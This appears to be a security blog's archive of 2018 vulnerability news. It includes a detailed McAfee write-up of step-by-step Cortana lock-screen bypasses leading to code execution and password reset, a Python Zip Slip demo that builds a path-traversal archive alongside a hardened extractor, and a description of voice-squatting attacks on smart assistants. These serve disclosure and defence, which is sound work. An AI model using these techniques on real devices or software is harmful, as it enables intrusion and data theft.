Category Archives: Vulnerability

The State of Security: Google’s Newest Feature: Find My Home

The commoditization of personal data in recent years has created huge opportunities for anyone with the skills to collect, catalogue and correlate every aspect of our lives. For many years now, there has been a war between browser vendors and unscrupulous advertisers looking for tricks to uniquely identify users and track their movements across websites. […]

The post Google’s Newest Feature: Find My Home appeared first on The State of Security.


Vulnerability in GnuPG allowed digital signature spoofing for decades

A vulnerability affecting GnuPG has made some of the widely used email encryption software vulnerable to digital signature spoofing for many years. The list of affected programs includes Enigmail and GPGTools.

About the vulnerability (CVE-2018-12020)

CVE-2018-12020, dubbed “SigSpoof” by Marcus Brinkmann, the researcher who found it, arises from “weak design choices.” “The signature verification routine in Enigmail 2.0.6.1, GPGTools 2018.2, and python-gnupg 0.4.2 parse the output of GnuPG 2.2.6 with a “--status-fd 2” option, which …

The post Vulnerability in GnuPG allowed digital signature spoofing for decades appeared first on Help Net Security.

Unintended Clipboard Paste Function in Windows 10 Leads to Information Leak in RS1

The McAfee Labs Advanced Threat Research team has been investigating the Windows 10 platform. We have submitted several vulnerabilities already and have disclosed our research to Microsoft. Please refer to our vulnerability disclosure policy for further details or the post from earlier this week on Windows 10 Cortana vulnerabilities.

Early last year, a trivial “information leak” was reported in Windows 10. This technique no longer works on most current builds of Windows 10, but a variation of this simple method works quite well on some versions of Windows 10, specifically RS1 (RedStone 1).

The issue is simple to describe and execute. For a local attack, you can use a physical keyboard; if there is a network vector that would allow one to remotely reach the Windows login screen (such as RDP), you can use the software-based keyboard accessible from the lock screen. On all versions of Windows 10, the “paste” function appears to be intentionally forbidden from the Windows lock screen, including the “Hey Cortana” function. The original finding demonstrated CTRL+V could be used to paste clipboard contents. This is now disabled, even on RS1. However, we have found a way to bypass this restriction using the keyboard shortcut CTRL + SHIFT + INSERT, allowing us to access in plain text the clipboard contents, whatever they may be. While we are continuing to explore this technique to force-copy functions (and access arbitrary content), for now we can access whatever happens to be copied. In the demo this is a password allowing login.


The post Unintended Clipboard Paste Function in Windows 10 Leads to Information Leak in RS1 appeared first on McAfee Blogs.

Researcher hacks smart fingerprint padlock in mere seconds

The Tapplock one “smart” padlock, which received many rave reviews by tech-focused news sites and YouTubers, can be forced to open in under two seconds with a smartphone. The discovery was made by Pen Test Partners researcher Andrew Tierney, who decided to probe the security of the software used by the product after seeing a YouTuber opening a locked Tapplock one by simply unscrewing its back and a few internal screws. Breaking into the “smart” …

The post Researcher hacks smart fingerprint padlock in mere seconds appeared first on Help Net Security.

New ‘Lazy FP State Restore’ Vulnerability Found in All Modern Intel CPUs

Hell Yeah! Another security vulnerability has been discovered in Intel chips that affects the processor's speculative execution technology—like Spectre and Meltdown—and could potentially be exploited to access sensitive information, including encryption-related data. Dubbed Lazy FP State Restore, the vulnerability (CVE-2018-3665) within Intel Core and Xeon processors has just been confirmed

Smashing Security #082: World Cup cybersecurity, crypto crashes, and a bang of a password fail


Coinrail cryptocurrency exchange goes offline after hack, Russia appears to be ‘live testing’ cyber attacks, and Florida stopped running background checks on gun buyers because of a forgotten password.

All this and much much more is discussed in the latest edition of the award-winning “Smashing Security” podcast by computer security veterans Graham Cluley and Carole Theriault, joined this week by football-mad John Leyden from The Register.

Cortana Software Could Help Anyone Unlock Your Windows 10 Computer

Cortana, an artificial intelligence-based smart assistant that Microsoft has built into every version of Windows 10, could help attackers unlock your system password. With its latest patch Tuesday release, Microsoft has pushed an important update to address an easily exploitable vulnerability in Cortana that could allow hackers to break into a locked Windows 10 system and execute malicious

Fooling security tools into believing malicious code was signed by Apple

The way developers of third-party security tools use the Apple code signing API could be exploited by attackers to make malicious code linger undetected on Macs, a security researcher has discovered. “Security, incident response, and forensics processes and personnel use code signing to weed out trusted code from untrusted code. To undermine a code signing implementation for a major OS would break a core security construct that many depend on for day to day security …

The post Fooling security tools into believing malicious code was signed by Apple appeared first on Help Net Security.

New Cortana Vulnerability Could Allow Cybercriminals to Bypass Lock Screen On Windows 10 Devices

Digital assistants help us look up the weather, play our favorite music, and allow us to quickly access a lot of our personal information. And between Amazon Alexa, Google Home, and Microsoft Cortana – these services have become all the rage these days. However, the latter service, according to the McAfee Labs Advanced Threat Research (ATR) team, can be easily compromised, which is why they’ve submitted a vulnerability to Microsoft which involves the default settings for Windows 10 and the Cortana voice assistant. The vulnerability can be used to do things such as retrieve information from Cortana, start an application from the Windows lock screen, and even log into a Windows 10 device without a user interacting with the computer.

To give you an idea of how someone can take advantage of this vulnerability, let’s first back up. Imagine you are sitting at your favorite coffee shop and need to use the restroom. As a security-minded individual, you lock your computer’s screen thinking that would keep bad people from accessing your information. With this vulnerability, all someone would have to do is say, “Hey Cortana,” then follow a few simple steps to gain access to the treasure trove of information, no reboot required.

McAfee researcher Cedric Cochin discovered that by simply typing while Cortana starts to listen to a request or question on a locked device, he could bring up a search menu. Cochin didn’t even have to say anything to Cortana; he simply clicked on the “tap and say” button and started typing in words. At that point, he could hover over search results, which included documents and other files, and see where they led to on that computer. What’s more, he was able to take it a step further and figured out a way to access certain confidential files and information.

Though there are limitations to what cybercriminals could do, there are ways they can get the right file results to show up, which have been outlined in our McAfee Labs blog post on this topic. After leveraging one of these techniques, cybercriminals could use this vulnerability to take malicious actions such as resetting passwords on a Windows 10 computer, even though the device is technically locked. In only a few seconds, an attacker has full access to a computer.

With the discovery of this vulnerability, the next question is – what can I do to not be a victim of this? Start by following these security tips:

  • Don’t leave your computer unattended. It’s important to note that this vulnerability is completely dependent on physical access to a Windows 10 computer with Cortana. Now that this vulnerability has been disclosed it’s important that you keep a close eye on your computer until you apply the update from Microsoft.
  • Apply updates immediately. The good news is – today is Patch Tuesday! And fortunately the update that Microsoft is rolling out today has a fix for this vulnerability to protect your Windows 10 computer. Be sure to update your computer immediately.

And, of course, to stay on top of the latest consumer and mobile security threats, be sure to follow me and @McAfee_Home on Twitter, listen to our podcast Hackable? and ‘Like’ us on Facebook.

The post New Cortana Vulnerability Could Allow Cybercriminals to Bypass Lock Screen On Windows 10 Devices appeared first on McAfee Blogs.

VMware plugs RCE hole in remote management agent

VMware has fixed a critical remote code execution vulnerability in VMware AirWatch Agent for Android and Windows Mobile, and is urging users to upgrade to the newest versions of the software (8.2 and 6.5.2, respectively). The iOS version is not affected. VMware AirWatch Agent is a mobile File Manager application and is part and parcel of the VMware Workspace ONE platform (powered by AirWatch unified endpoint management technology).

About the vulnerability (CVE-2018-6968)

“VMware Workspace ONE …

The post VMware plugs RCE hole in remote management agent appeared first on Help Net Security.

Want to Break Into a Locked Windows 10 Device? Ask Cortana (CVE-2018-8140)

June’s “Patch Tuesday” (June 12) is here, but it is likely many Windows 10 users have not yet applied these updates. If you have not, just be sure not to leave your laptop lying around! The patches in this cycle fix a code execution vulnerability using the default settings for Windows 10 and the “Cortana” voice assistant. We’ll detail how this vulnerability can be used to execute code from the locked screen of a fully patched Windows 10 machine (RS3 at the time of our original submission, and confirmed on RS4 prior to this patch cycle). The vulnerability was submitted to Microsoft as part of the McAfee Labs Advanced Threat Research team’s responsible disclosure policy, on April 23. Attribution for this vulnerability submission goes to Cedric Cochin, Cyber Security Architect and Senior Principal Engineer.

In this post, we will address three vectors of research that have been combined by Microsoft and together represent CVE-2018-8140. The first of these is an information leak, but we’ll culminate with a demo showing full code execution to log in to a locked Windows device!

Using “Hey Cortana!” to Retrieve Confidential Information

Personal digital assistants such as Siri, Alexa, Google Assistant, and Cortana have become commodities in many technologically inclined houses. From telling jokes, to helping with the grocery list, to turning on the kitchen lights, these robotic voices are beginning to feel oddly more and more personal as they expand their roles in our daily lives. However, we should consider the increased risk of built-in digital personal assistants when looking at new attack vectors for laptops, tablets, and smartphones. Our research on Microsoft’s Cortana voice assistant began after reading about the “BadUSB” attacks demonstrated by industry researchers. We decided to take this a step further and ended up finding and reporting to Microsoft several issues related to Cortana.

If you have spoken with Cortana, you may have noticed that “she” is very helpful for a number of simple tasks: providing definitions, or looking up corporations, movies, artists, or athletes. She can even do math! In Windows 10, on the most recent build at the time of submission, we observed that the default settings enable “Hey Cortana” from the lock screen, allowing anyone to interact with the voice-based assistant. This led to some interesting behavior and ultimately vulnerabilities allowing arbitrary code execution.

We begin this analysis with a quick look into Windows indexing. If you have ever opened the advanced view of the Windows Indexing control panel, and navigated to the File Types tab, you will see a long list of file extensions. For each of them you will find details about the associated filter used by the indexing process. Essentially you have the “file properties filter” and several other filters that could all be summarized as “file properties and file content filter.”

This means the index process will crack open the files and index their content, including some strings present in these documents. Let’s keep that in mind for later as we continue.

Using this knowledge, we wanted to try to access the same menu that you would see when using a Cortana search on an unlocked device.

This will come as a surprise and lies at the core of all the issues we found, but simply typing while Cortana starts to listen to a query on a locked device will bring up a Windows contextual menu, as shown below:

On top: the result of typing “pas” in the Cortana search field on an unlocked computer.
Above: the result of asking “Hey Cortana, P A S” and using a whitespace keyboard sequence.

In the preceding example, we queried Cortana for the term pas, no preamble to the question, just speaking the three letters, P. A. S. Why not “pass”? Because Cortana can be quite picky with verbal statements and there is no dictionary definition for “pass,” leading to Cortana inviting us to continue in Edge after unlocking the device. Alternatively, instead of issuing a verbal statement, we could click on the “tap and say” button and just start typing this text, for example.

We now have a contextual menu, displayed on a locked Windows 10 device. What could go wrong?

Remember that all the results presented by Cortana come from indexed files and applications, and that for some applications the content of the file is also indexed. Now we can simply hover over any of the relevant matches. If the match is driven by filename matching, then you will be presented with the full path of the file. If the match is driven by the file content matching, then you may be presented with the content of the file itself.

Keep in mind that the entire user folder structure is indexed, which includes the default location for most documents but also for mappings like OneDrive.

Example of data leakage using voice command with Cortana and the whitespace keyboard sequence.

Armed with this knowledge, you can use your imagination to come up with specific keywords that could be used to start harvesting confidential information from the locked device.

Code Execution from the Windows Lock Screen (User Interaction May be Required)

Next, we asked the question: Could we go a step further and get code execution in the context of the authenticated user? Remember we are using only a combination of voice commands and mouse/touchpad/touchscreen to gain access to the contextual menu at this point. We observed that just by hovering over a file, the full path or content of the file would be displayed. What happens if we were to click on it? That depends on the target. If the file being opened is an application or an executable (such as notepad or calc.exe), the file will run and be accessible only after the user properly logs in. If it is a document, script, or text file, it will be opened by an editor instead of being executed. At this point we can execute various preloaded Windows utilities such as calculator, but we cannot pass any parameters to the command line. We can open scripts including PowerShell, but instead of being executed, they will be opened in a text editor (notepad). The lack of parameters is a limitation for a “live off the land” attack, which uses current tools and content to achieve a malicious purpose; however, there are plenty of malicious activities that could be performed even with these restrictions. For example, many uninstallers will happily remove software without any need for parameters.

Let’s return to our goal: code execution from the lock screen. The only requirement for something to show up in the contextual menu is for it to be indexed.

Public folders indexed by default.

There are multiple ways for an unauthenticated attacker to get results to show up in the index of an authenticated user. One method relies on OneDrive. As the root of the OneDrive directory structure is in the user folder, all the OneDrive content is indexed by default. Basically, if you ever share a folder or file with “edit” rights, the person you share it with, as well as any other recipients of a forwarded link, can now drop a file that will be indexed. With the file indexed we have multiple options to proceed.

Option 1: Drop an Executable File

This method assumes you can write an executable file to the disk; it does not require you to have executed it. Via a phishing attack or another vulnerability, an attacker could drop a backdoor (for example, Cobalt Strike Beacon or Meterpreter) and be in business. If you need to execute the payload as an administrator, you can simply right-click (for a touchscreen this is a longer-hold screen press) and select “Run as administrator.”

When running applications that do not have the Auto-Elevate Privilege, you will trigger a user account control (UAC) prompt and nothing will execute. This could still result in a valid attack because users rarely check the content of the prompt and often proceed through the warning dialog box. The attacker would have to execute the program, and then wait for the authenticated user to log in and finish the job. If the application has auto-elevate privileges, there will be no UAC prompt and the application will execute at high integrity.

This is interesting behavior, but on its own not a very likely attack scenario, so let’s continue to explore our options. Why not simply use a USB key to drop the payload because we have physical access? The content of the USB key is not indexed, so it would not be presented as a result of the search query (although there are other ways to use a USB device; see below).

Option 2: Drop a non-PE Payload

Portable executable (PE) backdoors are great, but can we gain execution with a non-PE payload, for example, a PowerShell script? We can use the same right-click capability to assist, but with a small twist. The right-click menu is not always the same, even for a given file type.

When you ask Cortana about “PS1,” you will be presented with your indexed PowerShell scripts. A right click will allow you to “open file location” or “copy full path,” but with no means of execution.

If you click on the file as we already mentioned, the file will open in edit mode. Curiously, it will not open the default editor (PowerShell ISE) for PowerShell scripts; instead, it will open the script in notepad. We assume this was intended as a security measure because notepad cannot execute scripts, unlike PowerShell ISE.

The default right-click menu for PS1 files.

Remember we mentioned that Cortana changes results based on your input query? When properly logged in, if you ask Cortana about “txt” using the query “Hey Cortana” followed by the letters “T,” “X,” “T,” she will present you with text documents, Notepad, and the most recent documents opened by Notepad. Yet the right-click menu for items in the Recent category is different from the right-click menu for the same item in the Documents category.

At top: the context menu for a Recent item; above: the context menu for a Document item.

We follow a three-step process:

  • Land a PowerShell script in a location that will be indexed
    • Public folder, public share, or OneDrive
  • Execute a search query that will show the document and click on it
    • “Hey Cortana, PS1”
    • Select the PowerShell script you just indexed and left click
    • The PowerShell script opens in Notepad
  • Execute a search query that will show the recent documents, right click, and…
    • Using Cortana, type or search in the contextual menu for “txt”
    • Right click on the PowerShell script in the Recent category under the Apps tab at the top (not Documents)
    • Click “Run with PowerShell”

“Run with PowerShell” right-click menu option for Recent items.

We now have local code execution with the payload of our choosing, without any exploit, even if the device is encrypted, on an up-to-date locked Windows 10 device.

This technique helps us understand some of the differences between apps, documents, extensions, and the way Windows handles them from a locked or unlocked screen. Yet it probably does not represent much of a real-world attack vector. Then again, we are not finished.

Logging into a Locked Device with no User Interaction

Finally, we have local code execution, but with some real limitations. We need to get our payload indexed but we cannot pass command-line parameters. This could be a limiting factor for our PowerShell attack vector because the execution policy may prevent its execution, and without command-line parameters we cannot pass an “-ExecutionPolicy Bypass” (or any other flavor). We would also have to find a way to land a PS1 script on the victim’s box, and have remote access to the physical machine or the login screen.

The techniques we have described so far are far too complicated compared with the simplicity and effectiveness of what comes next.

You recall the use of the keyboard-timing sequence to trigger the contextual search menu from a locked screen while querying Cortana. Any keystroke can trigger the menu from the time when Cortana begins to listen to when the answer is displayed. Press any key at this point; we like to use the spacebar because you cannot backspace and Windows will nicely ignore or trim out the space in its text results anyway. Invoke keyboard input too early or before Cortana is listening and you will be prompted to enter your password; invoke too late and Cortana goes back to sleep or returns normal results without a context menu.

It is not very intuitive to use the keyboard in addition to voice commands, but you can type your search the same way you do on an unlocked device, assuming that you triggered Cortana to listen.

The following screenshot demonstrates this behavior:

  • Trigger Cortana via “Tap and Say” or “Hey Cortana”
  • Ask a question (this is more reliable) such as “What time is it?”
  • Press the space bar, and the context menu appears
  • Press esc, and the menu disappears
  • Press the space bar again, and the contextual menu appears, but this time the search query is empty
  • Start typing (you cannot use backspace). If you make a mistake, press esc and start again.
  • When done (carefully) typing your command, click on the entry in the Command category. (This category will appear only after the input is recognized as a command.)
  • You can always right click and select “Run as Administrator” (but remember the user would have to log in to clear the UAC)

You can use the following example of a simple PowerShell command to test. Enjoy the soothing beeps that demonstrate code execution from a locked device.

What can we do at this point? You name it. Our demo shows a password reset and login on a Windows 10 build, using only this simple technique.

The easiest mitigation technique, in the absence of patching the device (which we strongly recommend), is to turn off Cortana on the lock screen. This week’s Patch Tuesday from Microsoft contains fixes for these issues under CVE-2018-8140.
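The following audit script is an added example, not code from the McAfee post, for checking and applying the lock-screen mitigation described above on a single Windows 10 host. It assumes that the “Allow Cortana above lock” Group Policy setting is backed by the `AllowCortanaAboveLock` DWORD under the policy key below (confirm against the Search ADMX for your build), and it must run from an elevated PowerShell session.

```powershell
# Added example (not from the McAfee post): report whether Cortana can be invoked
# from the lock screen and, with -Remediate, disable it via the policy-backed
# registry value. Assumption: AllowCortanaAboveLock under the key below is the
# registry backing of the "Allow Cortana above lock" Group Policy setting.
[CmdletBinding()]
param(
    # Without this switch the script only reports; with it, it applies the policy.
    [switch]$Remediate
)

$policyKey = 'HKLM:\SOFTWARE\Policies\Microsoft\Windows\Windows Search'
$valueName = 'AllowCortanaAboveLock'

function Get-CortanaAboveLockState {
    # Missing key or value means no policy is set, so the Windows default applies
    # (enabled on the builds the post describes).
    $item = Get-ItemProperty -Path $policyKey -Name $valueName -ErrorAction SilentlyContinue
    if ($null -eq $item) { return 'NotConfigured' }
    if ($item.$valueName -eq 0) { return 'Disabled' }
    return 'Enabled'
}

function Set-CortanaAboveLockDisabled {
    if (-not (Test-Path $policyKey)) {
        New-Item -Path $policyKey -Force | Out-Null
    }
    New-ItemProperty -Path $policyKey -Name $valueName -PropertyType DWord -Value 0 -Force | Out-Null
}

$state = Get-CortanaAboveLockState
Write-Output "Cortana above lock policy: $state"

# The post's PS1 vector could not pass -ExecutionPolicy Bypass, so the machine
# policy is worth reporting; treat it as informational only, since execution
# policy is a safety feature rather than a security boundary.
$execPolicy = Get-ExecutionPolicy -Scope LocalMachine
Write-Output "LocalMachine execution policy: $execPolicy"

if ($state -ne 'Disabled') {
    if ($Remediate) {
        Set-CortanaAboveLockDisabled
        Write-Output "Set $valueName = 0 under $policyKey (takes effect after gpupdate /force or a reboot)."
    } else {
        Write-Warning "Cortana can still be invoked from the lock screen. Re-run with -Remediate to disable it."
    }
}
```

Applying the policy is a stopgap for devices that cannot take the June update immediately; patching remains the primary fix, as the post states.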

This concludes our examination of Cortana (at least for now). The McAfee Advanced Threat Research team has a fundamental goal of eliminating critical threats to the hardware and software we use; this month’s patch is a clear step toward furthering that goal. The attack surface created by vocal commands and personal digital assistants requires much more investigation; we are just scratching the surface of the amount of research that should be conducted in this critical area.

The post Want to Break Into a Locked Windows 10 Device? Ask Cortana (CVE-2018-8140) appeared first on McAfee Blogs.

Thousands of Android Devices Running Insecure Remote ADB Service

Despite warnings about the threat of leaving insecure remote services enabled on Android devices, manufacturers continue to ship devices with open ADB debug port setups that leave Android-based devices exposed to hackers. Android Debug Bridge (ADB) is a command-line feature that is generally used for diagnostic and debugging purposes, helping app developers communicate with Android devices

McAfee Blogs: Millions of Facebook Users May Have Unknowingly Shared Posts Publicly Because of New Bug

Facebook, Facebook, Facebook – between malware leveraging Facebook Messenger to send phishing messages, to apps on the platform mishandling customer data, the social media network has dealt with its fair share of cybersecurity woes these past few months. And just this week, yet another issue has emerged. It was discovered that a bug within Facebook may have accidentally changed settings for 14 million users, causing their posts to be shared publicly, even if they thought they were being shared only with friends.

When users share something on Facebook, they’re shown an audience selector, which provides a handful of options for who exactly gets to see a post. The user can select “Friends,” “Only me,” “Friends except,” or “Public,” with the choice supposedly defaulting to the one last used by the account owner. However, this bug made it so the default for all posts was set to public – meaning if the user was not paying attention, they unwittingly shipped their post out to a larger audience than they were anticipating.

Now, the good news is this bug was only affecting posts that went out from May 18th to May 27th, and no posts prior to that period were affected. Additionally, Facebook has confirmed that the bug has in fact been fixed.

However, this bug does act as a lesson about sharing out personal information on social media and reminds us to always be cautious of what we put out on the web. That being said, here are a few proactive security tips you can follow when sharing info on social media:

  • Always check in on your settings. This bug is a reminder that we should always check in on our current settings on social media platforms and apps. This bug swapped the settings without notifying users, but sometimes we may even forget whether we have the right settings on. Make it a priority a few times a month to go and see if you have the correct security settings in place on all your apps.
  • Be selective about what you share. The best way to control where your information goes is by cutting down what you share and how much you share it. That means reducing the amount of times you post on social media, and the type of information you do share. Anything private, personal, or that could help a cybercriminal learn more about you should remain off your social channels.
  • Use comprehensive security. Even though this data was willingly given, it’s important you still lock down all your devices with an extra layer of security to help keep yourself safe. To do just that, use a comprehensive solution such as McAfee Total Protection, in addition to limiting the amount of personal data you post and share.

And, of course, to stay on top of the latest consumer and mobile security threats, be sure to follow me and @McAfee_Home on Twitter, listen to our podcast Hackable? and ‘Like’ us on Facebook.

The post Millions of Facebook Users May Have Unknowingly Shared Posts Publicly Because of New Bug appeared first on McAfee Blogs.


Adobe releases fix for actively exploited Flash Player zero-day

If you’re still using Flash Player, it’s time to update it again, and quickly: Adobe has just patched a critical zero-day vulnerability (CVE-2018-5002) actively exploited in the wild. The attacks are “limited, targeted attacks against Windows users,” but updates (v30.0.0.113 for all platforms) are available for Adobe Flash Player for Windows, macOS, Linux and Chrome OS.

About CVE-2018-5002 and the attacks

It is a stack-based buffer overflow vulnerability that has been independently discovered …

The post Adobe releases fix for actively exploited Flash Player zero-day appeared first on Help Net Security.

SecurityOrb.com: Wireshark Security Advisory

Debian Security Advisory DSA-4217-1 (security@debian.org, https://www.debian.org/security/, https://www.debian.org/security/faq), Moritz Muehlenhoff, June 03, 2018
Package: wireshark
CVE IDs: CVE-2018-9273, CVE-2018-7320, CVE-2018-7334, CVE-2018-7335, CVE-2018-7419, CVE-2018-9261, CVE-2018-9264, CVE-2018-11358, CVE-2018-11360, CVE-2018-11362
It was discovered [...]

The post Wireshark Security Advisory appeared first on SecurityOrb.com.



SecurityOrb.com

Adobe Patched Zero-Day Vulnerability




Adobe has recently issued a security update for Flash Player in order to fix a zero-day vulnerability that was exploited by attackers in the wild.

The Flash Player vulnerability (CVE-2018-5002), a stack-based buffer overflow that allows arbitrary code execution, was patched on June 7.

The flaw was discovered independently by several security firms, most notably ICEBRG, Tencent, and two security teams from Chinese security giant Qihoo 360. It affects Adobe Flash Player 29.0.0.171 and earlier versions and is fixed in Flash Player 30.0.0.113.

“It allows for a maliciously crafted Flash object to execute code on victim computers, which enables an attacker to execute a range of payloads and actions,” said researchers from ICEBRG's Security Research Team, who were the first to report the vulnerability.

According to ICEBRG, the exploit uses a carefully crafted Microsoft Office document that downloads and runs a Flash exploit on the victim's machine. Adobe says the documents were distributed mainly by email.

Both ICEBRG and Qihoo 360 found evidence suggesting the campaign targeted victims in Qatar, based on its geopolitical themes.

“The weaponized document … is an Arabic language themed document that purports to inform the target of employee salary adjustments,” ICEBRG researchers said. “Most of the job titles included in the document are diplomatic in nature, specifically referring to salaries with positions referencing secretaries, ambassadors, diplomats, etc.”

According to Will Dormann of CERT/CC, besides fixing the flaw itself, Adobe added a prompt that asks users whether they want to load remote SWF content embedded in Office documents. The prompt also addresses a long-standing issue in Office applications, where Flash content was sometimes downloaded automatically without asking the user first.




Vulnerable ship systems: Many left exposed to hacking

Pen Test Partners’ Ken Munro and his colleagues – some of whom are former ship crew members who really understand bridge and propulsion systems – have been probing the security of ships’ IT systems for a while now and the results are depressing: satcom terminals exposed on the Internet, admin interfaces accessible via insecure protocols, no firmware signing, easy-to-guess default credentials, and so on. “Ship security is in its infancy – most of these types … More

The post Vulnerable ship systems: Many left exposed to hacking appeared first on Help Net Security.

Smashing Security #081: Hacker no-hopers, Wessex Water has a word, and we win an award

The ‘mastermind’ behind the Owari botnet doesn’t seem to have learnt anything from his victims, someone at Wessex Water forgets to remove an embarrassing sentence from a letter sent to customers, and we’re officially the best security podcast!

All this and much much more is discussed in the latest edition of the “Smashing Security” podcast by computer security veterans Graham Cluley and Carole Theriault, with cameo appearances by John Hawes, John Leyden, Paul Ducklin, and Mikko Hyppönen.

The Value of Capture the Flag Competitions

If you’ve ever attended an infosec or hacker conference, you’re sure to have seen the Capture the Flag or CTF. As with anything in this industry, there are ebbs and flows in the debate of the value of the competitions. Some argue that they are unrealistic. Others champion them for the skills required and the […]… Read More

The post The Value of Capture the Flag Competitions appeared first on The State of Security.

Zip Slip vulnerability affects thousands of projects

An arbitrary file overwrite vulnerability that can be exploited by attackers to achieve code execution on a target system affects a myriad of projects and multiple ecosystems, Snyk researchers have revealed. About the vulnerability The vulnerability, dubbed Zip Slip by the researchers, has been seen in the past before, but was never this widely spread, Snyk CEO Guy Podjarny told Help Net Security. “Zip Slip is a form of directory traversal that can be exploited … More

The post Zip Slip vulnerability affects thousands of projects appeared first on Help Net Security.

‘Zip Slip’ Vulnerability Affects Thousands of Projects Across Many Ecosystems

Security researchers at British software firm Snyk have revealed details of a critical vulnerability that affects thousands of projects across many ecosystems and can be exploited by attackers to achieve code execution on the target systems. Dubbed "Zip Slip," the issue is an arbitrary file overwrite vulnerability that triggers from a directory traversal attack while extracting files from an
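Both Zip Slip items above describe the same mechanism: an archive entry name that carries `../` components (or an absolute path), which an extraction library joins onto the destination directory without checking where the result lands. The Python below is an added illustration and is not code from Snyk or from either post. It builds a constructed in-memory archive with one traversing entry, shows a naive extractor writing outside its target directory, and then a hardened extractor that resolves every destination path and refuses the whole archive if any entry escapes the root. The function names, file names and scratch-directory layout are the example's own.

```python
"""Zip Slip: archive entry names are attacker input, not trusted paths."""
import io
import os
import tempfile
import zipfile


def build_malicious_zip() -> bytes:
    """Constructed sample archive: one benign entry plus one whose name
    climbs out of the extraction directory (the Zip Slip pattern)."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("readme.txt", "benign content\n")
        zf.writestr("../../evil.txt", "written outside the target directory\n")
    return buf.getvalue()


def extract_naive(archive: bytes, dest: str) -> list:
    """Vulnerable: joins each entry name onto dest and writes it as-is.
    CPython's ZipFile.extractall() sanitises names, so the bug is reproduced
    here the way many third-party extractors did it: by reading entries and
    opening the joined path directly."""
    written = []
    with zipfile.ZipFile(io.BytesIO(archive)) as zf:
        for info in zf.infolist():
            target = os.path.join(dest, info.filename)  # no validation at all
            os.makedirs(os.path.dirname(target), exist_ok=True)
            with open(target, "wb") as fh:
                fh.write(zf.read(info))
            written.append(os.path.realpath(target))
    return written


def is_safe_entry(root: str, name: str) -> bool:
    """True only if root/name, after resolving '..' and symlinks, still lies
    strictly inside root. Absolute names fail too: os.path.join discards
    root when name starts with '/'."""
    root = os.path.realpath(root)
    target = os.path.realpath(os.path.join(root, name))
    return target != root and os.path.commonpath([root, target]) == root


def extract_safe(archive: bytes, dest: str) -> list:
    """Hardened: validate every entry first and fail closed, so a bad
    archive writes nothing at all."""
    root = os.path.realpath(dest)
    written = []
    with zipfile.ZipFile(io.BytesIO(archive)) as zf:
        bad = [i.filename for i in zf.infolist() if not is_safe_entry(root, i.filename)]
        if bad:
            raise ValueError(f"Zip Slip entries rejected: {bad}")
        for info in zf.infolist():
            target = os.path.join(root, info.filename)
            if info.is_dir():
                os.makedirs(target, exist_ok=True)
                continue
            os.makedirs(os.path.dirname(target), exist_ok=True)
            with open(target, "wb") as fh:
                fh.write(zf.read(info))
            written.append(target)
    return written


def demo() -> dict:
    """Run both extractors against the constructed archive in a scratch
    directory and report what happened."""
    base = tempfile.mkdtemp(prefix="zipslip-")
    archive = build_malicious_zip()
    naive_dest = os.path.join(base, "a", "b")  # two levels deep, so '../..' lands in base
    safe_dest = os.path.join(base, "c", "d")
    os.makedirs(naive_dest)
    os.makedirs(safe_dest)

    extract_naive(archive, naive_dest)
    escaped = os.path.isfile(os.path.join(base, "evil.txt"))

    rejected = False
    try:
        extract_safe(archive, safe_dest)
    except ValueError:
        rejected = True
    return {
        "naive_escaped": escaped,          # evil.txt landed two directories up
        "safe_rejected": rejected,         # hardened extractor refused the archive
        "safe_wrote_files": bool(os.listdir(safe_dest)),  # and wrote nothing
    }


if __name__ == "__main__":
    print(demo())
```

The check is done on the resolved path rather than by searching the name for `..`, because `sub/../readme.txt` is harmless while a name that is already absolute, or that traverses through a symlink inside the destination, contains no `..` at the point it matters. Validating all entries before writing any also avoids a half-extracted tree when the bad entry is not the first one.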

Dozens of Vulnerabilities Found Under Hack the DTS Bug Bounty Program

The Hack the DTS bug bounty program uncovered dozens of vulnerabilities in the Defense Travel System serving the Department of Defense. On 30 May, vulnerability coordination platform HackerOne revealed the results of Hack the DTS. Nineteen trusted security researchers participated in the 29-day program and submitted 100 vulnerability reports over the course of the exercise. […]… Read More

The post Dozens of Vulnerabilities Found Under Hack the DTS Bug Bounty Program appeared first on The State of Security.

Researchers discover vulnerabilities in smart assistants’ voice commands

Virtual personal assistants (VPAs), also known as smart assistants, such as Amazon’s Alexa and Google Assistant, are in the spotlight for their vulnerability to attack. Take, for example, the incident in which an Oregon couple’s Echo smart speaker inadvertently recorded their conversation and sent it to a random contact. Or the time Alexa started laughing out of the blue. Indeed, something has to be done about these failures, whether they are accidental or not.

Earlier this month, researchers from Indiana University, the Chinese Academy of Sciences, and the University of Virginia found exploitable weaknesses in the VPAs above. Researchers dubbed the techniques they used to reveal these weaknesses as voice squatting and voice masquerading. Both take advantage of the way smart assistants process voice commands. Unsurprisingly, these also exploit users’ misconceptions about how such devices work.

How smart assistants work

VPA services used in smart speakers do their work through apps called “skills” (by Amazon) or “actions” (by Google). A skill or an action gives a VPA additional features. Users interact with a smart assistant through a voice user interface (VUI), running a skill or action with their voice.

Entrepreneurs, with the help of developers, are already taking advantage of creating their own voice assistant (VA) apps to cater to client needs, making their services accessible in the voice platform, or merely introducing an enjoyable experience to users.

As of this writing, the smart assistant app market is booming. Alexa alone already has tens of thousands of skills, thanks to the Alexa Skills Kit. Furthermore, Amazon has recently released Alexa Skill Blueprints, which makes skill creation easy for people with little or no coding knowledge.

Unfortunately, the availability of such a kit to the public has made abuse by potential threat actors possible, making the VPA realm an entirely new attack vector. If an attack is successful—and the study researchers conducted proved that it can be—a significant number of users could be affected. They concluded that remote, large-scale attacks are “indeed realistic.”

Squatters and masqueraders

Voice squatting is a method wherein a threat actor abuses the way a skill or action is invoked. Take an example from the researchers’ white paper. If a user says, “Alexa, open Capital One” to run the Capital One skill, a threat actor can register a malicious skill with a similarly pronounced name, such as Capital Won. The command meant for the Capital One skill is then hijacked to run the malicious Capital Won skill instead. Also, as Amazon now rewards kids for saying “please” when commanding Alexa, a similar hijack can occur if a threat actor uses a paraphrased name like Capital One please or Capital One Police.

“Please” and “police” may mean two totally different things to us, but for current smart assistants, these words are the same, as they cannot correctly recognize one invocation name over another similar-sounding one.

Suffice it to say, VPAs are not great at handling homophones.


Voice masquerading, on the other hand, is a method wherein a malicious skill impersonates a legitimate one to either trick users into giving out their personal information and account credentials or eavesdrop on conversations without user awareness.

